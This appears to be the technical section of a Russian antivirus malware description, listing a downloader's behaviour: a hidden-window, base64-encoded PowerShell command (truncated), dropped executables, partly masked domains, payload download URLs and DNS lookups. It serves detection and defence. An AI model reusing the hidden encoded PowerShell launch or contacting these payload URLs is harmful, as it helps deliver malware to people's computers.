Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAHcAawBwAGQAbgBmAGIAbgBoAGsAbgA9ACcAWABsAHYAbwB1AGoAdAB2AGUAJwA7ACQAUAB2AHgAdwBpAHIAbwBnAGcAbwAgAD0AIAAnADEAOQA4ACcAOwAkAEgAZgBlAGoAdQB5AHQAcQBqAGUAPQAnAFoAaAB4AHQAeQBoAGwAawA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1580
- %TEMP%\949656.cvr
- %HOMEPATH%\198.exe
- %HOMEPATH%\198.exe
- 'oa####ldeserto.info':80
- 'ic###eds.com':80
- 'ic###eds.com':443
- 'al###ase.com':80
- 'hu###omains.com':443
- 'ku####j.linuxpl.eu':80
- http://ic###eds.com/modules/xhdo6h/
- http://al###ase.com/plugins/gqwgr/
- http://ku####j.linuxpl.eu/pax3hdtv/7qj/
- 'ic###eds.com':443
- 'hu###omains.com':443
- DNS ASK oa####ldeserto.info
- DNS ASK ic###eds.com
- DNS ASK al###ase.com
- DNS ASK hu###omains.com
- DNS ASK tk###tore.com
- DNS ASK ku####j.linuxpl.eu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABWAHcAawBwAGQAbgBmAGIAbgBoAGsAbgA9ACcAWABsAHYAbwB1AGoAdAB2AGUAJwA7ACQAUAB2AHgAdwBpAHIAbwBnAGcAbwAgAD0AIAAnADEAOQA4ACcAOwAkAEgAZgBlAGoAdQB5AHQAcQBqAGUAPQAnAFoAaAB4AHQAeQBoAGwAawA...' (со скрытым окном)